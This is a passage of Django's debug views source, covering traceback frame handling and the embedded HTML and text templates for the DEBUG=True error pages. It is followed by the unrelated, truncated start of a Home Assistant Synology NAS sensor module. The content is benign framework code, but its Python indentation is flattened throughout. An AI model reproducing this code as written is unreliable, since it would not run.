# apply tokenize.detect_encoding to decode the source into a Unicode
# string, then we should do that ourselves.
if isinstance(source[0], six.binary_type):
encoding = 'ascii'
for line in source[:2]:
# File coding may be specified. Match pattern from PEP-263
# (http://www.python.org/dev/peps/pep-0263/)
match = re.search(br'coding[:=]\s*([-\w.]+)', line)
if match:
encoding = match.group(1).decode('ascii')
break
source = [six.text_type(sline, encoding, 'replace') for sline in source]
lower_bound = max(0, lineno - context_lines)
upper_bound = lineno + context_lines
pre_context = source[lower_bound:lineno]
context_line = source[lineno]
post_context = source[lineno + 1:upper_bound]
return lower_bound, pre_context, context_line, post_context
def get_traceback_frames(self):
def explicit_or_implicit_cause(exc_value):
explicit = getattr(exc_value, '__cause__', None)
implicit = getattr(exc_value, '__context__', None)
return explicit or implicit
# Get the exception and all its causes
exceptions = []
exc_value = self.exc_value
while exc_value:
exceptions.append(exc_value)
exc_value = explicit_or_implicit_cause(exc_value)
frames = []
# No exceptions were supplied to ExceptionReporter
if not exceptions:
return frames
# In case there's just one exception (always in Python 2,
# sometimes in Python 3), take the traceback from self.tb (Python 2
# doesn't have a __traceback__ attribute on Exception)
exc_value = exceptions.pop()
tb = self.tb if six.PY2 or not exceptions else exc_value.__traceback__
while tb is not None:
# Support for __traceback_hide__ which is used by a few libraries
# to hide internal frames.
if tb.tb_frame.f_locals.get('__traceback_hide__'):
tb = tb.tb_next
continue
filename = tb.tb_frame.f_code.co_filename
function = tb.tb_frame.f_code.co_name
lineno = tb.tb_lineno - 1
loader = tb.tb_frame.f_globals.get('__loader__')
module_name = tb.tb_frame.f_globals.get('__name__') or ''
pre_context_lineno, pre_context, context_line, post_context = self._get_lines_from_file(
filename, lineno, 7, loader, module_name,
)
if pre_context_lineno is not None:
frames.append({
'exc_cause': explicit_or_implicit_cause(exc_value),
'exc_cause_explicit': getattr(exc_value, '__cause__', True),
'tb': tb,
'type': 'django' if module_name.startswith('django.') else 'user',
'filename': filename,
'function': function,
'lineno': lineno + 1,
'vars': self.filter.get_traceback_frame_variables(self.request, tb.tb_frame),
'id': id(tb),
'pre_context': pre_context,
'context_line': context_line,
'post_context': post_context,
'pre_context_lineno': pre_context_lineno + 1,
})
# If the traceback for current exception is consumed, try the
# other exception.
if six.PY2:
tb = tb.tb_next
elif not tb.tb_next and exceptions:
exc_value = exceptions.pop()
tb = exc_value.__traceback__
else:
tb = tb.tb_next
return frames
def format_exception(self):
"""
Return the same data as from traceback.format_exception.
"""
import traceback
frames = self.get_traceback_frames()
tb = [(f['filename'], f['lineno'], f['function'], f['context_line']) for f in frames]
list = ['Traceback (most recent call last):\n']
list += traceback.format_list(tb)
list += traceback.format_exception_only(self.exc_type, self.exc_value)
return list
def technical_404_response(request, exception):
"Create a technical 404 error response. The exception should be the Http404."
try:
error_url = exception.args[0]['path']
except (IndexError, TypeError, KeyError):
error_url = request.path_info[1:] # Trim leading slash
try:
tried = exception.args[0]['tried']
except (IndexError, TypeError, KeyError):
tried = []
else:
if (not tried # empty URLconf
or (request.path == '/'
and len(tried) == 1 # default URLconf
and len(tried[0]) == 1
and getattr(tried[0][0], 'app_name', '') == getattr(tried[0][0], 'namespace', '') == 'admin')):
return default_urlconf(request)
urlconf = getattr(request, 'urlconf', settings.ROOT_URLCONF)
if isinstance(urlconf, types.ModuleType):
urlconf = urlconf.__name__
caller = ''
try:
resolver_match = resolve(request.path)
except Resolver404:
pass
else:
obj = resolver_match.func
if hasattr(obj, '__name__'):
caller = obj.__name__
elif hasattr(obj, '__class__') and hasattr(obj.__class__, '__name__'):
caller = obj.__class__.__name__
if hasattr(obj, '__module__'):
module = obj.__module__
caller = '%s.%s' % (module, caller)
t = DEBUG_ENGINE.from_string(TECHNICAL_404_TEMPLATE)
c = Context({
'urlconf': urlconf,
'root_urlconf': settings.ROOT_URLCONF,
'request_path': error_url,
'urlpatterns': tried,
'reason': force_bytes(exception, errors='replace'),
'request': request,
'settings': get_safe_settings(),
'raising_view_name': caller,
})
return HttpResponseNotFound(t.render(c), content_type='text/html')
def default_urlconf(request):
"Create an empty URLconf 404 error response."
t = DEBUG_ENGINE.from_string(DEFAULT_URLCONF_TEMPLATE)
c = Context({
"title": _("Welcome to Django"),
"heading": _("It worked!"),
"subheading": _("Congratulations on your first Django-powered page."),
"instructions": _("Of course, you haven't actually done any work yet. "
"Next, start your first app by running <code>python manage.py startapp [app_label]</code>."),
"explanation": _("You're seeing this message because you have <code>DEBUG = True</code> in your "
"Django settings file and you haven't configured any URLs. Get to work!"),
})
return HttpResponse(t.render(c), content_type='text/html')
#
# Templates are embedded in the file so that we know the error handler will
# always work even if the template loader is broken.
#
TECHNICAL_500_TEMPLATE = ("""
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE">
<title>{% if exception_type %}{{ exception_type }}{% else %}Report{% endif %}"""
"""{% if request %} at {{ request.path_info|escape }}{% endif %}</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; }
h2 { margin-bottom:.8em; }
h2 span { font-size:80%; color:#666; font-weight:normal; }
h3 { margin:1em 0 .5em 0; }
h4 { margin:0 0 .5em 0; font-weight: normal; }
code, pre { font-size: 100%; white-space: pre-wrap; }
table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; }
tbody td, tbody th { vertical-align:top; padding:2px 3px; }
thead th {
padding:1px 6px 1px 3px; background:#fefefe; text-align:left;
font-weight:normal; font-size:11px; border:1px solid #ddd;
}
tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; }
table.vars { margin:5px 0 2px 40px; }
table.vars td, table.req td { font-family:monospace; }
table td.code { width:100%; }
table td.code pre { overflow:hidden; }
table.source th { color:#666; }
table.source td { font-family:monospace; white-space:pre; border-bottom:1px solid #eee; }
ul.traceback { list-style-type:none; color: #222; }
ul.traceback li.frame { padding-bottom:1em; color:#666; }
ul.traceback li.user { background-color:#e0e0e0; color:#000 }
div.context { padding:10px 0; overflow:hidden; }
div.context ol { padding-left:30px; margin:0 10px; list-style-position: inside; }
div.context ol li { font-family:monospace; white-space:pre; color:#777; cursor:pointer; padding-left: 2px; }
div.context ol li pre { display:inline; }
div.context ol.context-line li { color:#505050; background-color:#dfdfdf; padding: 3px 2px; }
div.context ol.context-line li span { position:absolute; right:32px; }
.user div.context ol.context-line li { background-color:#bbb; color:#000; }
.user div.context ol li { color:#666; }
div.commands { margin-left: 40px; }
div.commands a { color:#555; text-decoration:none; }
.user div.commands a { color: black; }
#summary { background: #ffc; }
#summary h2 { font-weight: normal; color: #666; }
#explanation { background:#eee; }
#template, #template-not-exist { background:#f6f6f6; }
#template-not-exist ul { margin: 0 0 10px 20px; }
#template-not-exist .postmortem-section { margin-bottom: 3px; }
#unicode-hint { background:#eee; }
#traceback { background:#eee; }
#requestinfo { background:#f6f6f6; padding-left:120px; }
#summary table { border:none; background:transparent; }
#requestinfo h2, #requestinfo h3 { position:relative; margin-left:-100px; }
#requestinfo h3 { margin-bottom:-1em; }
.error { background: #ffc; }
.specific { color:#cc3300; font-weight:bold; }
h2 span.commands { font-size:.7em;}
span.commands a:link {color:#5E5694;}
pre.exception_value { font-family: sans-serif; color: #666; font-size: 1.5em; margin: 10px 0 10px 0; }
.append-bottom { margin-bottom: 10px; }
</style>
{% if not is_email %}
<script type="text/javascript">
//<!--
function getElementsByClassName(oElm, strTagName, strClassName){
// Written by Jonathan Snook, http://www.snook.ca/jon; Add-ons by Robert Nyman, http://www.robertnyman.com
var arrElements = (strTagName == "*" && document.all)? document.all :
oElm.getElementsByTagName(strTagName);
var arrReturnElements = new Array();
strClassName = strClassName.replace(/\-/g, "\\-");
var oRegExp = new RegExp("(^|\\s)" + strClassName + "(\\s|$)");
var oElement;
for(var i=0; i<arrElements.length; i++){
oElement = arrElements[i];
if(oRegExp.test(oElement.className)){
arrReturnElements.push(oElement);
}
}
return (arrReturnElements)
}
function hideAll(elems) {
for (var e = 0; e < elems.length; e++) {
elems[e].style.display = 'none';
}
}
window.onload = function() {
hideAll(getElementsByClassName(document, 'table', 'vars'));
hideAll(getElementsByClassName(document, 'ol', 'pre-context'));
hideAll(getElementsByClassName(document, 'ol', 'post-context'));
hideAll(getElementsByClassName(document, 'div', 'pastebin'));
}
function toggle() {
for (var i = 0; i < arguments.length; i++) {
var e = document.getElementById(arguments[i]);
if (e) {
e.style.display = e.style.display == 'none' ? 'block': 'none';
}
}
return false;
}
function varToggle(link, id) {
toggle('v' + id);
var s = link.getElementsByTagName('span')[0];
var uarr = String.fromCharCode(0x25b6);
var darr = String.fromCharCode(0x25bc);
s.innerHTML = s.innerHTML == uarr ? darr : uarr;
return false;
}
function switchPastebinFriendly(link) {
s1 = "Switch to copy-and-paste view";
s2 = "Switch back to interactive view";
link.innerHTML = link.innerHTML == s1 ? s2: s1;
toggle('browserTraceback', 'pastebinTraceback');
return false;
}
//-->
</script>
{% endif %}
</head>
<body>
<div id="summary">
<h1>{% if exception_type %}{{ exception_type }}{% else %}Report{% endif %}"""
"""{% if request %} at {{ request.path_info|escape }}{% endif %}</h1>
<pre class="exception_value">"""
"""{% if exception_value %}{{ exception_value|force_escape }}{% else %}No exception message supplied{% endif %}"""
"""</pre>
<table class="meta">
{% if request %}
<tr>
<th>Request Method:</th>
<td>{{ request.META.REQUEST_METHOD }}</td>
</tr>
<tr>
<th>Request URL:</th>
<td>{{ request.build_absolute_uri|escape }}</td>
</tr>
{% endif %}
<tr>
<th>Django Version:</th>
<td>{{ django_version_info }}</td>
</tr>
{% if exception_type %}
<tr>
<th>Exception Type:</th>
<td>{{ exception_type }}</td>
</tr>
{% endif %}
{% if exception_type and exception_value %}
<tr>
<th>Exception Value:</th>
<td><pre>{{ exception_value|force_escape }}</pre></td>
</tr>
{% endif %}
{% if lastframe %}
<tr>
<th>Exception Location:</th>
<td>{{ lastframe.filename|escape }} in {{ lastframe.function|escape }}, line {{ lastframe.lineno }}</td>
</tr>
{% endif %}
<tr>
<th>Python Executable:</th>
<td>{{ sys_executable|escape }}</td>
</tr>
<tr>
<th>Python Version:</th>
<td>{{ sys_version_info }}</td>
</tr>
<tr>
<th>Python Path:</th>
<td><pre>{{ sys_path|pprint }}</pre></td>
</tr>
<tr>
<th>Server time:</th>
<td>{{server_time|date:"r"}}</td>
</tr>
</table>
</div>
{% if unicode_hint %}
<div id="unicode-hint">
<h2>Unicode error hint</h2>
<p>The string that could not be encoded/decoded was: <strong>{{ unicode_hint|force_escape }}</strong></p>
</div>
{% endif %}
{% if template_does_not_exist %}
<div id="template-not-exist">
<h2>Template-loader postmortem</h2>
{% if postmortem %}
<p class="append-bottom">Django tried loading these templates, in this order:</p>
{% for entry in postmortem %}
<p class="postmortem-section">Using engine <code>{{ entry.backend.name }}</code>:</p>
<ul>
{% if entry.tried %}
{% for attempt in entry.tried %}
<li><code>{{ attempt.0.loader_name }}</code>: {{ attempt.0.name }} ({{ attempt.1 }})</li>
{% endfor %}
</ul>
{% else %}
<li>This engine did not provide a list of tried templates.</li>
{% endif %}
</ul>
{% endfor %}
{% else %}
<p>No templates were found because your 'TEMPLATES' setting is not configured.</p>
{% endif %}
</div>
{% endif %}
{% if template_info %}
<div id="template">
<h2>Error during template rendering</h2>
<p>In template <code>{{ template_info.name }}</code>, error at line <strong>{{ template_info.line }}</strong></p>
<h3>{{ template_info.message }}</h3>
<table class="source{% if template_info.top %} cut-top{% endif %}
{% ifnotequal template_info.bottom template_info.total %} cut-bottom{% endifnotequal %}">
{% for source_line in template_info.source_lines %}
{% ifequal source_line.0 template_info.line %}
<tr class="error"><th>{{ source_line.0 }}</th>
<td>
{{ template_info.before }}
<span class="specific">{{ template_info.during }}</span>
{{ template_info.after }}
</td>
</tr>
{% else %}
<tr><th>{{ source_line.0 }}</th>
<td>{{ source_line.1 }}</td></tr>
{% endifequal %}
{% endfor %}
</table>
</div>
{% endif %}
{% if frames %}
<div id="traceback">
<h2>Traceback <span class="commands">{% if not is_email %}<a href="#" onclick="return switchPastebinFriendly(this);">
Switch to copy-and-paste view</a></span>{% endif %}
</h2>
{% autoescape off %}
<div id="browserTraceback">
<ul class="traceback">
{% for frame in frames %}
{% ifchanged frame.exc_cause %}{% if frame.exc_cause %}
<li><h3>
{% if frame.exc_cause_explicit %}
The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception:
{% else %}
During handling of the above exception ({{ frame.exc_cause }}), another exception occurred:
{% endif %}
</h3></li>
{% endif %}{% endifchanged %}
<li class="frame {{ frame.type }}">
<code>{{ frame.filename|escape }}</code> in <code>{{ frame.function|escape }}</code>
{% if frame.context_line %}
<div class="context" id="c{{ frame.id }}">
{% if frame.pre_context and not is_email %}
<ol start="{{ frame.pre_context_lineno }}" class="pre-context" id="pre{{ frame.id }}">
{% for line in frame.pre_context %}
<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ line|escape }}</pre></li>
{% endfor %}
</ol>
{% endif %}
<ol start="{{ frame.lineno }}" class="context-line">
<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>
{{ frame.context_line|escape }}</pre>{% if not is_email %} <span>...</span>{% endif %}</li></ol>
{% if frame.post_context and not is_email %}
<ol start='{{ frame.lineno|add:"1" }}' class="post-context" id="post{{ frame.id }}">
{% for line in frame.post_context %}
<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ line|escape }}</pre></li>
{% endfor %}
</ol>
{% endif %}
</div>
{% endif %}
{% if frame.vars %}
<div class="commands">
{% if is_email %}
<h2>Local Vars</h2>
{% else %}
<a href="#" onclick="return varToggle(this, '{{ frame.id }}')"><span>▶</span> Local vars</a>
{% endif %}
</div>
<table class="vars" id="v{{ frame.id }}">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in frame.vars|dictsort:"0" %}
<tr>
<td>{{ var.0|force_escape }}</td>
<td class="code"><pre>{{ var.1 }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% endif %}
</li>
{% endfor %}
</ul>
</div>
{% endautoescape %}
<form action="http://dpaste.com/" name="pasteform" id="pasteform" method="post">
{% if not is_email %}
<div id="pastebinTraceback" class="pastebin">
<input type="hidden" name="language" value="PythonConsole">
<input type="hidden" name="title"
value="{{ exception_type|escape }}{% if request %} at {{ request.path_info|escape }}{% endif %}">
<input type="hidden" name="source" value="Django Dpaste Agent">
<input type="hidden" name="poster" value="Django">
<textarea name="content" id="traceback_area" cols="140" rows="25">
Environment:
{% if request %}
Request Method: {{ request.META.REQUEST_METHOD }}
Request URL: {{ request.build_absolute_uri|escape }}
{% endif %}
Django Version: {{ django_version_info }}
Python Version: {{ sys_version_info }}
Installed Applications:
{{ settings.INSTALLED_APPS|pprint }}
Installed Middleware:
{{ settings.MIDDLEWARE_CLASSES|pprint }}
{% if template_does_not_exist %}Template loader postmortem
{% if postmortem %}Django tried loading these templates, in this order:
{% for entry in postmortem %}
Using engine {{ entry.backend.name }}:
{% if entry.tried %}{% for attempt in entry.tried %} * {{ attempt.0.loader_name }}: {{ attempt.0.name }} ({{ attempt.1 }})
{% endfor %}{% else %} This engine did not provide a list of tried templates.
{% endif %}{% endfor %}
{% else %}No templates were found because your 'TEMPLATES' setting is not configured.
{% endif %}
{% endif %}{% if template_info %}
Template error:
In template {{ template_info.name }}, error at line {{ template_info.line }}
{{ template_info.message }}{% for source_line in template_info.source_lines %}
{% ifequal source_line.0 template_info.line %}
{{ source_line.0 }} : {{ template_info.before }} {{ template_info.during }} {{ template_info.after }}
{% else %}
{{ source_line.0 }} : {{ source_line.1 }}
{% endifequal %}{% endfor %}{% endif %}
Traceback:{% for frame in frames %}
{% ifchanged frame.exc_cause %}{% if frame.exc_cause %}{% if frame.exc_cause_explicit %}
The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception:
{% else %}
During handling of the above exception ({{ frame.exc_cause }}), another exception occurred:
{% endif %}{% endif %}{% endifchanged %}
File "{{ frame.filename|escape }}" in {{ frame.function|escape }}
{% if frame.context_line %} {{ frame.lineno }}. {{ frame.context_line|escape }}{% endif %}{% endfor %}
Exception Type: {{ exception_type|escape }}{% if request %} at {{ request.path_info|escape }}{% endif %}
Exception Value: {{ exception_value|force_escape }}
</textarea>
<br><br>
<input type="submit" value="Share this traceback on a public Web site">
</div>
</form>
</div>
{% endif %}
{% endif %}
<div id="requestinfo">
<h2>Request information</h2>
{% if request %}
<h3 id="get-info">GET</h3>
{% if request.GET %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.GET.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No GET data</p>
{% endif %}
<h3 id="post-info">POST</h3>
{% if filtered_POST %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in filtered_POST.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No POST data</p>
{% endif %}
<h3 id="files-info">FILES</h3>
{% if request.FILES %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.FILES.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No FILES data</p>
{% endif %}
<h3 id="cookie-info">COOKIES</h3>
{% if request.COOKIES %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.COOKIES.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No cookie data</p>
{% endif %}
<h3 id="meta-info">META</h3>
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.META.items|dictsort:"0" %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>Request data not supplied</p>
{% endif %}
<h3 id="settings-info">Settings</h3>
<h4>Using settings module <code>{{ settings.SETTINGS_MODULE }}</code></h4>
<table class="req">
<thead>
<tr>
<th>Setting</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in settings.items|dictsort:"0" %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
</div>
{% if not is_email %}
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in your
Django settings file. Change that to <code>False</code>, and Django will
display a standard page generated by the handler for this status code.
</p>
</div>
{% endif %}
</body>
</html>
""")
TECHNICAL_500_TEXT_TEMPLATE = """{% firstof exception_type 'Report' %}{% if request %} at {{ request.path_info }}{% endif %}
{% firstof exception_value 'No exception message supplied' %}
{% if request %}
Request Method: {{ request.META.REQUEST_METHOD }}
Request URL: {{ request.build_absolute_uri }}{% endif %}
Django Version: {{ django_version_info }}
Python Executable: {{ sys_executable }}
Python Version: {{ sys_version_info }}
Python Path: {{ sys_path }}
Server time: {{server_time|date:"r"}}
Installed Applications:
{{ settings.INSTALLED_APPS|pprint }}
Installed Middleware:
{{ settings.MIDDLEWARE_CLASSES|pprint }}
{% if template_does_not_exist %}Template loader postmortem
{% if postmortem %}Django tried loading these templates, in this order:
{% for entry in postmortem %}
Using engine {{ entry.backend.name }}:
{% if entry.tried %}{% for attempt in entry.tried %} * {{ attempt.0.loader_name }}: {{ attempt.0.name }} ({{ attempt.1 }})
{% endfor %}{% else %} This engine did not provide a list of tried templates.
{% endif %}{% endfor %}
{% else %}No templates were found because your 'TEMPLATES' setting is not configured.
{% endif %}
{% endif %}{% if template_info %}
Template error:
In template {{ template_info.name }}, error at line {{ template_info.line }}
{{ template_info.message }}{% for source_line in template_info.source_lines %}
{% ifequal source_line.0 template_info.line %}
{{ source_line.0 }} : {{ template_info.before }} {{ template_info.during }} {{ template_info.after }}
{% else %}
{{ source_line.0 }} : {{ source_line.1 }}
{% endifequal %}{% endfor %}{% endif %}{% if frames %}
Traceback:
{% for frame in frames %}
{% ifchanged frame.exc_cause %}
{% if frame.exc_cause %}
{% if frame.exc_cause_explicit %}
The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception:
{% else %}
During handling of the above exception ({{ frame.exc_cause }}), another exception occurred:
{% endif %}
{% endif %}
{% endifchanged %}
File "{{ frame.filename }}" in {{ frame.function }}
{% if frame.context_line %} {{ frame.lineno }}. {{ frame.context_line }}{% endif %}
{% endfor %}
{% if exception_type %}Exception Type: {{ exception_type }}{% if request %} at {{ request.path_info }}{% endif %}
{% if exception_value %}Exception Value: {{ exception_value }}{% endif %}{% endif %}{% endif %}
{% if request %}Request information:
GET:{% for k, v in request.GET.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No GET data{% endfor %}
POST:{% for k, v in filtered_POST.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No POST data{% endfor %}
FILES:{% for k, v in request.FILES.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No FILES data{% endfor %}
COOKIES:{% for k, v in request.COOKIES.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No cookie data{% endfor %}
META:{% for k, v in request.META.items|dictsort:"0" %}
{{ k }} = {{ v|stringformat:"r" }}{% endfor %}
{% else %}Request data not supplied
{% endif %}
Settings:
Using settings module {{ settings.SETTINGS_MODULE }}{% for k, v in settings.items|dictsort:"0" %}
{{ k }} = {{ v|stringformat:"r" }}{% endfor %}
You're seeing this error because you have DEBUG = True in your
Django settings file. Change that to False, and Django will
display a standard page generated by the handler for this status code.
"""
TECHNICAL_404_TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at {{ request.path_info|escape }}</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>{{ request.META.REQUEST_METHOD }}</td>
</tr>
<tr>
<th>Request URL:</th>
<td>{{ request.build_absolute_uri|escape }}</td>
</tr>
{% if raising_view_name %}
<tr>
<th>Raised by:</th>
<td>{{ raising_view_name }}</td>
</tr>
{% endif %}
</table>
</div>
<div id="info">
{% if urlpatterns %}
<p>
Using the URLconf defined in <code>{{ urlconf }}</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
{% for pattern in urlpatterns %}
<li>
{% for pat in pattern %}
{{ pat.regex.pattern }}
{% if forloop.last and pat.name %}[name='{{ pat.name }}']{% endif %}
{% endfor %}
</li>
{% endfor %}
</ol>
<p>The current URL, <code>{{ request_path|escape }}</code>, didn't match any of these.</p>
{% else %}
<p>{{ reason }}</p>
{% endif %}
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
"""
DEFAULT_URLCONF_TEMPLATE = """
<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE"><title>{{ title }}</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; }
h2 { margin-bottom:.8em; }
h2 span { font-size:80%; color:#666; font-weight:normal; }
h3 { margin:1em 0 .5em 0; }
h4 { margin:0 0 .5em 0; font-weight: normal; }
table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; }
tbody td, tbody th { vertical-align:top; padding:2px 3px; }
thead th {
padding:1px 6px 1px 3px; background:#fefefe; text-align:left;
font-weight:normal; font-size:11px; border:1px solid #ddd;
}
tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#summary { background: #e0ebff; }
#summary h2 { font-weight: normal; color: #666; }
#explanation { background:#eee; }
#instructions { background:#f6f6f6; }
#summary table { border:none; background:transparent; }
</style>
</head>
<body>
<div id="summary">
<h1>{{ heading }}</h1>
<h2>{{ subheading }}</h2>
</div>
<div id="instructions">
<p>
{{ instructions|safe }}
</p>
</div>
<div id="explanation">
<p>
{{ explanation|safe }}
</p>
</div>
</body></html>
"""
|
|
"""
Support for Synology NAS Sensors.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.synologydsm/
"""
import logging
from datetime import timedelta
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.helpers.entity import Entity
from homeassistant.const import (
CONF_HOST, CONF_USERNAME, CONF_PASSWORD, CONF_PORT,
CONF_MONITORED_CONDITIONS, TEMP_CELSIUS, EVENT_HOMEASSISTANT_START)
from homeassistant.util import Throttle
import homeassistant.helpers.config_validation as cv
import voluptuous as vol
REQUIREMENTS = ['python-synology==0.1.0']
_LOGGER = logging.getLogger(__name__)
CONF_DISKS = 'disks'
CONF_VOLUMES = 'volumes'
DEFAULT_NAME = 'Synology DSM'
DEFAULT_PORT = 5000
MIN_TIME_BETWEEN_UPDATES = timedelta(minutes=15)
_UTILISATION_MON_COND = {
'cpu_other_load': ['CPU Load (Other)', '%', 'mdi:chip'],
'cpu_user_load': ['CPU Load (User)', '%', 'mdi:chip'],
'cpu_system_load': ['CPU Load (System)', '%', 'mdi:chip'],
'cpu_total_load': ['CPU Load (Total)', '%', 'mdi:chip'],
'cpu_1min_load': ['CPU Load (1 min)', '%', 'mdi:chip'],
'cpu_5min_load': ['CPU Load (5 min)', '%', 'mdi:chip'],
'cpu_15min_load': ['CPU Load (15 min)', '%', 'mdi:chip'],
'memory_real_usage': ['Memory Usage (Real)', '%', 'mdi:memory'],
'memory_size': ['Memory Size', 'Mb', 'mdi:memory'],
'memory_cached': ['Memory Cached', 'Mb', 'mdi:memory'],
'memory_available_swap': ['Memory Available (Swap)', 'Mb', 'mdi:memory'],
'memory_available_real': ['Memory Available (Real)', 'Mb', 'mdi:memory'],
'memory_total_swap': ['Memory Total (Swap)', 'Mb', 'mdi:memory'],
'memory_total_real': ['Memory Total (Real)', 'Mb', 'mdi:memory'],
'network_up': ['Network Up', 'Kbps', 'mdi:upload'],
'network_down': ['Network Down', 'Kbps', 'mdi:download'],
}
_STORAGE_VOL_MON_COND = {
'volume_status': ['Status', None, 'mdi:checkbox-marked-circle-outline'],
'volume_device_type': ['Type', None, 'mdi:harddisk'],
'volume_size_total': ['Total Size', None, 'mdi:chart-pie'],
'volume_size_used': ['Used Space', None, 'mdi:chart-pie'],
'volume_percentage_used': ['Volume Used', '%', 'mdi:chart-pie'],
'volume_disk_temp_avg': ['Average Disk Temp', None, 'mdi:thermometer'],
'volume_disk_temp_max': ['Maximum Disk Temp', None, 'mdi:thermometer'],
}
_STORAGE_DSK_MON_COND = {
'disk_name': ['Name', None, 'mdi:harddisk'],
'disk_device': ['Device', None, 'mdi:dots-horizontal'],
'disk_smart_status': ['Status (Smart)', None,
'mdi:checkbox-marked-circle-outline'],
'disk_status': ['Status', None, 'mdi:checkbox-marked-circle-outline'],
'disk_exceed_bad_sector_thr': ['Exceeded Max Bad Sectors', None,
'mdi:test-tube'],
'disk_below_remain_life_thr': ['Below Min Remaining Life', None,
'mdi:test-tube'],
'disk_temp': ['Temperature', None, 'mdi:thermometer'],
}
_MONITORED_CONDITIONS = list(_UTILISATION_MON_COND.keys()) + \
list(_STORAGE_VOL_MON_COND.keys()) + \
list(_STORAGE_DSK_MON_COND.keys())
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Required(CONF_USERNAME): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
vol.Optional(CONF_MONITORED_CONDITIONS):
vol.All(cv.ensure_list, [vol.In(_MONITORED_CONDITIONS)]),
vol.Optional(CONF_DISKS, default=None): cv.ensure_list,
vol.Optional(CONF_VOLUMES, default=None): cv.ensure_list,
})
def setup_platform(hass, config, add_devices_callback, discovery_info=None):
"""Setup the Synology NAS Sensor."""
# pylint: disable=too-many-locals
def run_setup(event):
"""Wait until HASS is fully initialized before creating.
Delay the setup until Home Assistant is fully initialized.
This allows any entities to be created already
"""
# Setup API
api = SynoApi(config.get(CONF_HOST), config.get(CONF_PORT),
config.get(CONF_USERNAME), config.get(CONF_PASSWORD),
hass.config.units.temperature_unit)
sensors = [SynoNasUtilSensor(api, variable,
_UTILISATION_MON_COND[variable])
for variable in config[CONF_MONITORED_CONDITIONS]
if variable in _UTILISATION_MON_COND]
# Handle all Volumes
